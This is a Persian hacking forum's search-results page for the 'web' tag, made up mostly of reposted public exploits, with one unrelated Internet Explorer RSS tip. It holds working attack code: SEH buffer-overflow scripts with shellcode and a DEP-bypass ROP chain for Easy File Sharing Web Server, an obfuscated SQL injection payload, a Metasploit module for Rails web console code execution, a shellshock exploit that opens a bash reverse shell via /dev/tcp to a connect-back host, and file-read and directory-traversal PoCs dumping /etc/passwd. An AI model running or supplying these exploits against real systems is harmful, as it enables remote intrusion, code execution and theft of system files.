رفتن به مطلب

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'web'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • AnonySec
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پروژه های شرکت
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

دسته ها

  • Articles

40 نتیجه پیدا شد

  1. Title: Meinberg LANTIME Web Configuration Utility - Arbitrary File Read Author: Jakub Palaczynski CVE: CVE-2017-16787 Exploit tested on: ================== Meinberg LANTIME Web Configuration Utility 6.16.008 Vulnerability affects: ====================== All LTOS6 firmware releases before 6.24.004 Vulnerability: ************** Arbitrary File Read: ==================== It is possible to read arbitrary file on the system with root permissions Proof of Concept: First instance: https://host/cgi-bin/mainv2?value=800&showntpclientipinfo=xxx&ntpclientcounterlogfile=/etc/passwd&lcs=xxx Info-User user is able to read any file on the system with root permissions. Second instance: User with Admin-User access is able to read any file on the system via firmware update functionality. Curl accepts "file" schema which actually downloads file from the filesystem. Then it is possible to download /upload/update file which contains content of requested file. Contact: ======== Jakub[dot]Palaczynski[at]gmail[dot]com
  2. Hacking

    # # # # # # Exploit Title: Easy Web Search 4.0 - SQL Injection # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://nelliwinne.net/ # Software Link: https://codecanyon.net/item/easy-web-search-php-search-engine-with-image-search-and-crawling-system/17574164 # Demo: http://codecanyon.nelliwinne.net/EasyWebSearch/ # Version: 4.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/admin/admin-delete.php?id=[SQL] # http://localhost/[PATH]/admin/admin-spidermode.php?id=[SQL] # # 755'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+''=' # # Etc.. # # # # #
  3. Trick-windows

    شما مي‌توانيد به اطلاعاتي از قبيل اخبار ورزشي، آب و هوا و غيره دسترسي داشته باشيد در IE8 دو امكان به نام‌هاي RSS Feed و Web Slices فراهم شده و مي‌توانيد اخبار و اطلاعات به‌روز را از آن‌ها دريافت كنيد قابل ذكر است كه تمام سايت‌ها داراي RSS نمي‌باشد حال وارد سايت مايكروسافت شويد مشاهده مي‌كنيد RSS Feed در نوار ابزار فعال شده و نشان مي‌دهد كه اين سايت حاوي RSS مي‌باشد. با كليك روي اين آيكن مي‌توانيد RSS‌هاي موجود در سايت را مشاهده كنيد. با كليك روي مثلث كوچك كنار آن مي‌توانيد Feed موجود دسترسي پيدا كنيد. با كليك روي اين گزينه صفحه‌اي نمايان شده و اطلاعات به‌روز را در اختيار شما قرار مي‌دهد. در صورتي كه مي‌خواهيد به اين اطلاعات دسترسي داشته باشيد Subscribe to this feed را كليك كنيد تا كادر مربوطه نمايان شود. در قسمت نام مي‌توانيد نام دلخواه را به Feed اختصاص دهيد در قسمت Create in مي‌توانيد محل ايجاد آن را مشخص كنيد كه به طور پيش‌فرض در Feeds قرار مي‌گيرد با كليك روي New folder مي‌توانيد يك پوشه جديد براي آن ايجاد كنيد. با فعال كردن گزينه بعد نيز Feed مستقيما به Favorite bar اضافه مي‌شود در نهايت Subscribe را كليك كنيد. بدين ترتيب در هر سايت ديگري هم باشيد مي‌توانيد با كليك روي Feed مورد نظر به اطلاعات آن دسترسي داشته باشيد. در ادامه با مشخصه ديگري به نام Web Slices آَشنا خواهيد شد براي شروع وارد سايت espn.com شويد همان‌طور كه مي‌بينيد آيكن RSS در اين سايت مشاهده نمي‌شود. بلكه آيكن جديدي به نام Web Slices ديده مي‌شود با كليك روي اين آيكن پنجره‌اي نمايان مي‌شود. كه با كليك روي Add Favorite bar مي‌توانيد Web Slices را به آن اضافه كنيد. بدين ترتيب مي‌توانيد در هر سايت ديگري هم كه قرار داشته باشيد به اين Web Slices‌ها دسترسي داشته باشيد. حال از منوي Tools گزينه Internet Options را انتخاب كنيد. سربرگ Content را فعال نموده و با قسمت آخر پنجره كه مربوط به RSS Feed و Web Slices توجه كنيد با كليك روي Settings مي‌توانيد به تنظيمات مربوط به اين مشخصه‌ها دسترسي داشته باشيد. با فعال كردن اين گزينه مي‌توانيد تعيين كنيد كه اين اطلاعات هر چند روز يك بار يا هرچند ساعت يك بار تكرار شود. فعال كردن گزينه بعد پس از مطالعه هريك از Feed‌ها آن Feed به عنوان خوانده شده به رنگ قرمز علامت‌گذاري مي‌شود. با فعال كردن گزينه …Play a sound زماني كه در يك RSS Feed و Web Slices موجود باشد صدايي شنيده خواهد شد و اين موضوع را اطلاع مي‌دهد با فعال كردن گزينه بعد زماني كه يك RSS به‌روزرساني شود صدايي شنيده خواهدشد.
  4. Hacking

    # # # # # # Exploit Title: Easy Web Search 4.0 - SQL Injection # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://nelliwinne.net/ # Software Link: https://codecanyon.net/item/easy-web-search-php-search-engine-with-image-search-and-crawling-system/17574164 # Demo: http://codecanyon.nelliwinne.net/EasyWebSearch/ # Version: 4.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/admin/admin-delete.php?id=[SQL] # http://localhost/[PATH]/admin/admin-spidermode.php?id=[SQL] # # 755'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+''=' # # Etc.. # # # # #
  5. #!/usr/bin/env python # Easy File Sharing Web Server v7.2 Remote SEH Based Overflow # The buffer overwrites ebx with 750+ offset, when sending 4059 it overwrites the EBX # vulnerable file /changeuser.ghp > Cookies UserID=[buf] # Means there are two ways to exploit changeuser.ghp # Tested on Win7 x64 and x86, it should work on win8/win10 # By Audit0r # https://twitter.com/Audit0rSA import sys, socket, struct if len(sys.argv) <= 1: print "Usage: python efsws.py [host] [port]" exit() host = sys.argv[1] port = int(sys.argv[2]) # https://code.google.com/p/win-exec-calc-shellcode/ shellcode = ( "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" + "\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" + "\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" + "\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" + "\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" + "\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" + "\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" + "\x1c\x39\xbd" ) print "[+]Connecting to" + host craftedreq = "A"*4059 craftedreq += "\xeb\x06\x90\x90" # basic SEH jump craftedreq += struct.pack("<I", 0x10017743) # pop commands from ImageLoad.dll craftedreq += "\x90"*40 # NOPer craftedreq += shellcode craftedreq += "C"*50 # filler httpreq = ( "GET /changeuser.ghp HTTP/1.1\r\n" "User-Agent: Mozilla/4.0\r\n" "Host:" + host + ":" + str(port) + "\r\n" "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" "Accept-Language: en-us\r\n" "Accept-Encoding: gzip, deflate\r\n" "Referer: http://" + host + "/\r\n" "Cookie: SESSIONID=6771; UserID=" + craftedreq + "; PassWD=;\r\n" "Conection: Keep-Alive\r\n\r\n" ) print "[+]Sending the Calc...." s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.send(httpreq) s.close()
  6. #!/usr/bin/env python # # Exploit title: Easy File Sharing Web Server v7.2 - Remote SEH Buffer Overflow (DEP bypass with ROP) # Date: 29/11/2015 # Exploit Author: Knaps # Contact: @TheKnapsy # Website: http://blog.knapsy.com # Software Link: http://www.sharing-file.com/efssetup.exe # Version: Easy File Sharing Web Server v7.2 # Tested on: Windows 7 x64, but should work on any other Windows platform # # Notes: # - based on non-DEP SEH buffer overflow exploit by Audit0r (https://www.exploit-db.com/exploits/38526/) # - created for fun & practice, also because it's not 1998 anymore - gotta bypass that DEP! :) # - bad chars: '\x00' and '\x3b' # - max shellcode size allowed: 1260 bytes # import sys, socket, struct # ROP chain generated with mona.py - www.corelan.be (and slightly fixed by @TheKnapsy) # Essentially, use PUSHAD to set all parameters and call VirtualProtect() to disable DEP. def create_rop_chain(): rop_gadgets = [ # Generate value of 201 in EAX 0x10015442, # POP EAX # RETN [ImageLoad.dll] 0xFFFFFDFF, # Value of '-201' 0x100231d1, # NEG EAX # RETN [ImageLoad.dll] # Put EAX into EBX (other unneccessary stuff comes with this gadget as well...) 0x1001da09, # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll] # Carry on with the ROP as generated by mona.py 0x10015442, # POP EAX # RETN [ImageLoad.dll] 0x61c832d0, # ptr to &VirtualProtect() [IAT sqlite3.dll] # Compensate for the ADD EBX,EAX gadget above, jump over 1 address, which is a dummy writeable location # used solely by the remaining part of the above gadget (it doesn't really do anything for us) 0x1001281a, # ADD ESP,4 # RETN [ImageLoad.dll] 0x61c73281, # &Writable location [sqlite3.dll] # And carry on further as generated by mona.py 0x1002248c, # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll] 0x61c18d81, # XCHG EAX,EDI # RETN [sqlite3.dll] 0x1001d626, # XOR ESI,ESI # RETN [ImageLoad.dll] 0x10021a3e, # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll] 0x10013ad6, # POP EBP # RETN [ImageLoad.dll] 0x61c227fa, # & push esp # ret [sqlite3.dll] 0x10022c4c, # XOR EDX,EDX # RETN [ImageLoad.dll] # Now bunch of ugly increments... unfortunately couldn't find anything nicer :( 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x1001b4f6, # POP ECX # RETN [ImageLoad.dll] 0x61c73281, # &Writable location [sqlite3.dll] 0x100194b3, # POP EDI # RETN [ImageLoad.dll] 0x1001a858, # RETN (ROP NOP) [ImageLoad.dll] 0x10015442, # POP EAX # RETN [ImageLoad.dll] 0x90909090, # nop 0x100240c2, # PUSHAD # RETN [ImageLoad.dll] ] return ''.join(struct.pack('<I', _) for _ in rop_gadgets) # Check command line args if len(sys.argv) <= 1: print "Usage: python poc.py [host] [port]" exit() host = sys.argv[1] port = int(sys.argv[2]) # Offsets rop_offset = 2455 max_size = 5000 seh_offset = 4059 eax_offset = 4183 # move ESP out of the way so the shellcode doesn't corrupt itself during execution # metasm > add esp,-1500 shellcode = "\x81\xc4\x24\xfa\xff\xff" # Just as a PoC, spawn calc.exe. Replace with any other shellcode you want # (maximum size of shellcode allowed: 1260 bytes) # # msfvenom -p windows/exec CMD=calc.exe -b '\x00\x3b' -f python # Payload size: 220 bytes shellcode += "\xbb\xde\x37\x73\xe9\xdb\xdf\xd9\x74\x24\xf4\x58\x31" shellcode += "\xc9\xb1\x31\x31\x58\x13\x83\xe8\xfc\x03\x58\xd1\xd5" shellcode += "\x86\x15\x05\x9b\x69\xe6\xd5\xfc\xe0\x03\xe4\x3c\x96" shellcode += "\x40\x56\x8d\xdc\x05\x5a\x66\xb0\xbd\xe9\x0a\x1d\xb1" shellcode += "\x5a\xa0\x7b\xfc\x5b\x99\xb8\x9f\xdf\xe0\xec\x7f\xde" shellcode += "\x2a\xe1\x7e\x27\x56\x08\xd2\xf0\x1c\xbf\xc3\x75\x68" shellcode += "\x7c\x6f\xc5\x7c\x04\x8c\x9d\x7f\x25\x03\x96\xd9\xe5" shellcode += "\xa5\x7b\x52\xac\xbd\x98\x5f\x66\x35\x6a\x2b\x79\x9f" shellcode += "\xa3\xd4\xd6\xde\x0c\x27\x26\x26\xaa\xd8\x5d\x5e\xc9" shellcode += "\x65\x66\xa5\xb0\xb1\xe3\x3e\x12\x31\x53\x9b\xa3\x96" shellcode += "\x02\x68\xaf\x53\x40\x36\xb3\x62\x85\x4c\xcf\xef\x28" shellcode += "\x83\x46\xab\x0e\x07\x03\x6f\x2e\x1e\xe9\xde\x4f\x40" shellcode += "\x52\xbe\xf5\x0a\x7e\xab\x87\x50\x14\x2a\x15\xef\x5a" shellcode += "\x2c\x25\xf0\xca\x45\x14\x7b\x85\x12\xa9\xae\xe2\xed" shellcode += "\xe3\xf3\x42\x66\xaa\x61\xd7\xeb\x4d\x5c\x1b\x12\xce" shellcode += "\x55\xe3\xe1\xce\x1f\xe6\xae\x48\xf3\x9a\xbf\x3c\xf3" shellcode += "\x09\xbf\x14\x90\xcc\x53\xf4\x79\x6b\xd4\x9f\x85" buffer = "A" * rop_offset # padding buffer += create_rop_chain() buffer += shellcode buffer += "A" * (seh_offset - len(buffer)) # padding buffer += "BBBB" # overwrite nSEH pointer buffer += struct.pack("<I", 0x1002280a) # overwrite SEH record with stack pivot (ADD ESP,1004 # RETN [ImageLoad.dll]) buffer += "A" * (eax_offset - len(buffer)) # padding buffer += struct.pack("<I", 0xffffffff) # overwrite EAX to always trigger an exception buffer += "A" * (max_size - len(buffer)) # padding httpreq = ( "GET /changeuser.ghp HTTP/1.1\r\n" "User-Agent: Mozilla/4.0\r\n" "Host:" + host + ":" + str(port) + "\r\n" "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" "Accept-Language: en-us\r\n" "Accept-Encoding: gzip, deflate\r\n" "Referer: http://" + host + "/\r\n" "Cookie: SESSIONID=6771; UserID=" + buffer + "; PassWD=;\r\n" "Conection: Keep-Alive\r\n\r\n" ) # Send payload to the server s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.send(httpreq) s.close()
  7. # Exploit Title: Easy File Sharing Web Server 7.2 - HEAD HTTP request SEH Buffer Overflow # Date: 12/2/2015 # Exploit Author: ArminCyber # Contact: [email protected] # Version: 7.2 # Tested on: XP SP3 EN # category: Remote Exploit # Usage: ./exploit.py ip port import socket import sys host = str(sys.argv[1]) port = int(sys.argv[2]) a = socket.socket() print "Connecting to: " + host + ":" + str(port) a.connect((host,port)) entire=4500 # Junk buff = "A"*4061 # Next SEH buff+= "\xeb\x0A\x90\x90" # pop pop ret buff+= "\x98\x97\x01\x10" buff+= "\x90"*19 # calc.exe # Bad Characters: \x20 \x2f \x5c shellcode = ( "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" "\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" "\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" "\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" "\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" "\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" "\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" "\x1c\x39\xbd" ) buff+= shellcode buff+= "\x90"*7 buff+= "A"*(4500-4061-4-4-20-len(shellcode)-20) # HEAD a.send("HEAD " + buff + " HTTP/1.0\r\n\r\n") a.close() print "Done..."
  8. # Exploit Title: Easy File Sharing Web Server 7.2 - GET HTTP request SEH Buffer Overflow # Date: 12/2/2015 # Exploit Author: ArminCyber # Contact: [email protected] # Version: 7.2 # Tested on: XP SP3 EN # category: Remote Exploit # Usage: ./exploit.py ip port import socket import sys host = str(sys.argv[1]) port = int(sys.argv[2]) a = socket.socket() print "Connecting to: " + host + ":" + str(port) a.connect((host,port)) entire=4500 # Junk buff = "A"*4061 # Next SEH buff+= "\xeb\x0A\x90\x90" # pop pop ret buff+= "\x98\x97\x01\x10" buff+= "\x90"*19 # calc.exe # Bad Characters: \x20 \x2f \x5c shellcode = ( "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" "\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" "\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" "\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" "\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" "\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" "\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" "\x1c\x39\xbd" ) buff+= shellcode buff+= "\x90"*7 buff+= "A"*(4500-4061-4-4-20-len(shellcode)-20) # GET a.send("GET " + buff + " HTTP/1.0\r\n\r\n") a.close() print "Done..."
  9. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Ruby on Rails Development Web Console (v2) Code Execution', 'Description' => %q{ This module exploits a remote code execution feature of the Ruby on Rails framework. This feature is exposed if the config.web_console.whitelisted_ips setting includes untrusted IP ranges and the web-console gem is enabled. }, 'Author' => ['hdm'], 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'https://github.com/rails/web-console' ] ], 'Platform' => 'ruby', 'Arch' => ARCH_RUBY, 'Privileged' => false, 'Targets' => [ ['Automatic', {} ] ], 'DefaultOptions' => { 'PrependFork' => true }, 'DisclosureDate' => 'May 2 2016', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(3000), OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', '/missing404' ]) ], self.class) end # # Identify the web console path and session ID, then inject code with it # def exploit res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path), 'method' => 'GET' }, 25) unless res print_error("Error: No response requesting #{datastore['TARGETURI']}") return end unless res.body.to_s =~ /data-mount-point='([^']+)'/ if res.body.to_s.index('Application Trace') && res.body.to_s.index('Toggle session dump') print_error('Error: The web console is either disabled or you are not in the whitelisted scope') else print_error("Error: No rails stack trace found requesting #{datastore['TARGETURI']}") end return end console_path = normalize_uri($1, 'repl_sessions') unless res.body.to_s =~ /data-session-id='([^']+)'/ print_error("Error: No session id found requesting #{datastore['TARGETURI']}") return end session_id = $1 print_status("Sending payload to #{console_path}/#{session_id}") res = send_request_cgi({ 'uri' => normalize_uri(console_path, session_id), 'method' => 'PUT', 'headers' => { 'Accept' => 'application/vnd.web-console.v2', 'X-Requested-With' => 'XMLHttpRequest' }, 'vars_post' => { 'input' => payload.encoded } }, 25) end end
  10. #!/usr/bin/env python # TrendMicro InterScan Web Security Virtul Appliance # ================================================== # InterScan Web Security is a software virtual appliance that # dynamically protects against the ever-growing flood of web # threats at the Internet gateway exclusively designed to secure # you against traditional and emerging web threats at the Internet # gateway. The appliance however is shipped with a vulnerable # version of Bash susceptible to shellshock (I know right?). An # attacker can exploit this vulnerability by calling the CGI # shellscript "/cgi-bin/cgiCmdNotify" which can be exploited # to perform arbitrary code execution. A limitation of this # vulnerability is that the attacker must have credentials for # the admin web interface to exploit this flaw. The panel runs # over HTTP by default so a man-in-the-middle attack could be # used to gain credentials and compromise the appliance. # # $ python trendmicro_IWSVA_shellshock.py 192.168.56.101 admin password 192.168.56.1 # [+] TrendMicro InterScan Web Security Virtual Appliance CVE-2014-6271 exploit # [-] Authenticating to '192.168.56.101' with 'admin' 'password' # [-] JSESSIONID = DDE38E62757ADC00A51311F1F953EEBA # [-] exploiting shellshock CVE-2014-6271... # bash: no job control in this shell # bash-4.1$ id # uid=498(iscan) gid=499(iscan) groups=499(iscan) # # -- Hacker Fantastic # # (https://www.myhackerhouse.com) import requests import sys import os def spawn_listener(): os.system("nc -l 8080") def shellshock(ip,session,cbip): user_agent = {'User-agent': '() { :; }; /bin/bash -i >& /dev/tcp/'+cbip+'/8080 0>&1'} cookies = {'JSESSIONID': session} print "[-] exploiting shellshock CVE-2014-6271..." myreq = requests.get("http://"+ip+":1812/cgi-bin/cgiCmdNotify", headers = user_agent, cookies = cookies) def login_http(ip,user,password): mydata = {'wherefrom':'','wronglogon':'no','uid':user, 'passwd':password,'pwd':'Log+On'} print "[-] Authenticating to '%s' with '%s' '%s'" % (ip,user,password) myreq = requests.post("http://"+ip+":1812/uilogonsubmit.jsp", data=mydata) session_cookie = myreq.history[0].cookies.get('JSESSIONID') print "[-] JSESSIONID = %s" % session_cookie return session_cookie if __name__ == "__main__": print "[+] TrendMicro InterScan Web Security Virtual Appliance CVE-2014-6271 exploit" if len(sys.argv) < 5: print "[-] use with <ip> <user> <pass> <connectback_ip>" sys.exit() newRef=os.fork() if newRef==0: spawn_listener() else: session = login_http(sys.argv[1],sys.argv[2],sys.argv[3]) shellshock(sys.argv[1],session,sys.argv[4])
  11. Hacking

    Horos 2.1.0 Web Portal Remote Information Disclosure Exploit Vendor: Horos Project Product web page: https://www.horosproject.org Affected version: 2.1.0 Summary: Horos™ is an open-source, free medical image viewer. The goal of the Horos Project is to develop a fully functional, 64-bit medical image viewer for OS X. Horos is based upon OsiriX and other open source medical imaging libraries. Desc: Horos suffers from a file disclosure vulnerability when input passed thru the URL path is not properly verified before being used to read files. This can be exploited to include files from local resources with directory traversal attacks. Tested on: macOS Sierra/10.12.2 macOS Sierra/10.12.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2016-5387 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5387.php 15.12.2016 -- PoC request: http://127.0.0.1:3333/.../...//.../...//.../...//.../...//.../...//etc/passwd Response: ## # User Database # # Note that this file is consulted directly only when the system is running # in single-user mode. At other times this information is provided by # Open Directory. # # See the opendirectoryd(8) man page for additional information about # Open Directory. ## nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false root:*:0:0:System Administrator:/var/root:/bin/sh daemon:*:1:1:System Services:/var/root:/usr/bin/false _uucp:*:4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico _taskgated:*:13:13:Task Gate Daemon:/var/empty:/usr/bin/false _networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false ... ... ...
  12. Hacking

